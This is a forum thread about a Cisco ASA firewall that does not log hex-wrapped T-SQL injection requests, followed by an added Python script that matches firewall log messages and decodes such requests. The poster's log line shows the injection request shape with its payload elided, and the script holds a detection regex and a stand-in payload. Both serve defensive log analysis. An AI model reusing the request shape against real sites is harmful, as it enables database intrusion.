07-23-2008 11:03 AM - edited 03-11-2019 06:19 AM
I have a bunch of attack requests not being logged by my asa-5550 version 7.2(4)
On my web-server I see an attack:
B.A.D.IP; HTTP/1.0 - [23/Jul/2008:11:37:30 -0700] GET /downloads/file/fid?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(...%20AS%20CHAR(4000));EXEC(@S); HTTP/1.0 500 4635; null; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
The only thing I see in the ASA logs is:
Jul 23 11:37:29 192.168.22.254 %ASA-7-609001: Built local-host outside:B.A.D.IP
Jul 23 11:37:29 192.168.22.254 %ASA-6-302013: Built inbound TCP connection 1803718934 for outside:B.A.D.IP/2668 (B.A.D.IP/2668) to inside:192.168.10.100/80 (G.OO.D.IP/80)
Jul 23 11:37:29 192.168.22.254 %ASA-6-302013: Built inbound TCP connection 1803718936 for outside:B.A.D.IP/2669 (B.A.D.IP/2669) to inside:192.168.10.100/80 (G.OO.D.IP/80)
Jul 23 11:37:30 192.168.22.254 %ASA-6-302014: Teardown TCP connection 1803718936 for outside:B.A.D.IP/2669 to inside:192.168.10.100/80 duration 0:00:01 bytes 4123 TCP FINs
Jul 23 11:37:30 192.168.22.254 %ASA-6-302014: Teardown TCP connection 1803718934 for outside:B.A.D.IP/2668 to inside:192.168.10.100/80 duration 0:00:01 bytes 4122 TCP FINs
Jul 23 11:37:30 192.168.22.254 %ASA-7-609002: Teardown local-host outside:B.A.D.IP duration 0:00:01
Usually I get the ASA log messages (%ASA-5-304001) that I can grep for to see all of the 'Accessed URL' lines. For some reason none of these attacks are being logged. I'm concerned that not only are they getting through, they are doing so silently.
07-29-2008 06:08 AM
Refer to the following urls for more info on the log messages you have got:
http://www.cisco.com/en/US/docs/security/asa/asa80/system/message/logmsgs.html#wp4770603
http://www.cisco.com/en/US/docs/security/asa/asa80/system/message/logmsgs.html#wp4774514
07-29-2008 06:20 AM
Thank you for the response.
I am well aware of the logging types; the problem is that I'm not receiving the logging message 304001 for the given URI. I receive them for all other URIs, just not for this specific attack.
My thought is that the ASA signature swallows it, does not send it to syslog, and then passes it on to the web server. I'm okay with it passing it along but it seems a little odd that it does not get logged.
I have been getting many of these requests and see them on all of my web servers, but not one shows up in my syslog, while all the other 304001 messages do show up.
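As an added example that is not part of the thread or of any Cisco tooling: the check below does what the poster is doing by hand, correlating the ASA connection messages (302013/302014) against the 304001 'Accessed URL' messages and flagging HTTP connections that produced none, then decoding the percent-encoded request from the web server's own log so the hidden T-SQL can be read. All log lines in it are constructed for the example (the IP placeholders follow the thread's B.A.D.IP / G.OO.D.IP; the hex literal inside CAST() is a stand-in, not the real payload); the exact field layout of the 304001 message and the 'user' prefix are assumptions about the ASA syslog format. It goes slightly beyond the thread by handling both single-byte CHAR and UTF-16LE NVARCHAR hex payloads.

```python
"""Correlate ASA 302013/304001 messages and decode a hex-wrapped T-SQL request.

Added example, not from the original thread.  Every log line below is
constructed for this script; IP placeholders follow the thread's convention.
"""
import re
from typing import Optional
from urllib.parse import unquote

# Constructed ASA syslog sample: three inbound HTTP connections, of which only
# the one from 10.9.8.7 produced a 304001 "Accessed URL" message.
ASA_LOG = """\
Jul 23 11:37:29 192.168.22.254 %ASA-6-302013: Built inbound TCP connection 1803718934 for outside:B.A.D.IP/2668 (B.A.D.IP/2668) to inside:192.168.10.100/80 (G.OO.D.IP/80)
Jul 23 11:37:29 192.168.22.254 %ASA-6-302013: Built inbound TCP connection 1803718936 for outside:B.A.D.IP/2669 (B.A.D.IP/2669) to inside:192.168.10.100/80 (G.OO.D.IP/80)
Jul 23 11:37:29 192.168.22.254 %ASA-6-302013: Built inbound TCP connection 1803718940 for outside:10.9.8.7/40001 (10.9.8.7/40001) to inside:192.168.10.100/80 (G.OO.D.IP/80)
Jul 23 11:37:29 192.168.22.254 %ASA-5-304001: 10.9.8.7 Accessed URL 192.168.10.100:/downloads/file/fid
Jul 23 11:37:30 192.168.22.254 %ASA-6-302014: Teardown TCP connection 1803718936 for outside:B.A.D.IP/2669 to inside:192.168.10.100/80 duration 0:00:01 bytes 4123 TCP FINs
Jul 23 11:37:30 192.168.22.254 %ASA-6-302014: Teardown TCP connection 1803718934 for outside:B.A.D.IP/2668 to inside:192.168.10.100/80 duration 0:00:01 bytes 4122 TCP FINs
Jul 23 11:37:30 192.168.22.254 %ASA-6-302014: Teardown TCP connection 1803718940 for outside:10.9.8.7/40001 to inside:192.168.10.100/80 duration 0:00:01 bytes 512 TCP FINs
"""

# Constructed web-server access line in the thread's layout.  The hex literal is
# a stand-in built for this example: 0x53454C4543542031 decodes to "SELECT 1".
WEB_LOG_LINE = (
    "B.A.D.IP; HTTP/1.0 - [23/Jul/2008:11:37:30 -0700] "
    "GET /downloads/file/fid?;DECLARE%20@S%20CHAR(4000);SET%20@S="
    "CAST(0x53454C4543542031%20AS%20CHAR(4000));EXEC(@S); HTTP/1.0 500 4635"
)

BUILT_RE = re.compile(
    r"%ASA-6-302013: Built (?:inbound|outbound) TCP connection (?P<conn>\d+) "
    r"for \w+:(?P<src>[^/\s]+)/(?P<sport>\d+) \([^)]*\) "
    r"to \w+:(?P<dst>[^/\s]+)/(?P<dport>\d+)"
)
# Assumed 304001 layout: "[user ]<src> Accessed URL <dst>:<url>".  It carries
# no connection id, so correlation is by the (source, destination) pair.
ACCESSED_RE = re.compile(
    r"%ASA-5-304001: (?:user )?(?P<src>\S+) Accessed URL (?P<dst>[^:\s]+):(?P<url>\S*)"
)
REQUEST_RE = re.compile(r"\b(?:GET|POST|HEAD) (\S+) HTTP/\d\.\d")
# DECLARE @var ... CAST(0x<hex> ...) ... EXEC( : the hex-wrapped T-SQL shape.
TSQL_RE = re.compile(r"DECLARE\s+@\w+.*?CAST\s*\(\s*0x[0-9A-Fa-f]+.*?EXEC\s*\(", re.I | re.S)


def find_unlogged_http_connections(asa_log: str, http_port: int = 80) -> list:
    """Connection ids of built TCP connections to http_port whose (src, dst)
    pair never produced a 304001 'Accessed URL' message in the same log."""
    accessed = set()
    built = []
    for line in asa_log.splitlines():
        m = ACCESSED_RE.search(line)
        if m:
            accessed.add((m["src"], m["dst"]))
            continue
        m = BUILT_RE.search(line)
        if m and int(m["dport"]) == http_port:
            built.append((m["conn"], m["src"], m["dst"]))
    return [conn for conn, src, dst in built if (src, dst) not in accessed]


def decode_request_uri(access_line: str) -> str:
    """Extract the request target from an access-log line and undo the
    percent-encoding so the payload can be read and pattern-matched."""
    m = REQUEST_RE.search(access_line)
    if not m:
        raise ValueError("no request line found")
    return unquote(m.group(1))


def looks_like_tsql_injection(decoded_uri: str) -> bool:
    """True when the decoded target has the DECLARE/CAST(0x..)/EXEC shape."""
    return TSQL_RE.search(decoded_uri) is not None


def decode_cast_hex(decoded_uri: str) -> Optional[str]:
    """Recover the SQL hidden inside CAST(0x... AS CHAR/NVARCHAR(...))."""
    m = re.search(r"CAST\s*\(\s*0x([0-9A-Fa-f]+)", decoded_uri, re.I)
    if not m:
        return None
    raw = bytes.fromhex(m.group(1))
    # NVARCHAR payloads are UTF-16LE: every second byte is NUL for ASCII text.
    if len(raw) >= 2 and raw[1::2] == b"\x00" * (len(raw) // 2):
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")


def report(asa_log: str, access_line: str) -> dict:
    """Bundle the correlation and the decoded request into one result."""
    decoded = decode_request_uri(access_line)
    return {
        "unlogged_connections": find_unlogged_http_connections(asa_log),
        "decoded_uri": decoded,
        "tsql_injection": looks_like_tsql_injection(decoded),
        "hidden_sql": decode_cast_hex(decoded),
    }


if __name__ == "__main__":
    for key, value in report(ASA_LOG, WEB_LOG_LINE).items():
        print(f"{key}: {value}")
```

Because 304001 has no connection id, the correlation key is the (source, destination) pair, so a source that sends both logged and unlogged requests in the same window would not be flagged; a production version should bucket by timestamp and compare counts of 302013 against counts of 304001 per pair rather than testing mere presence.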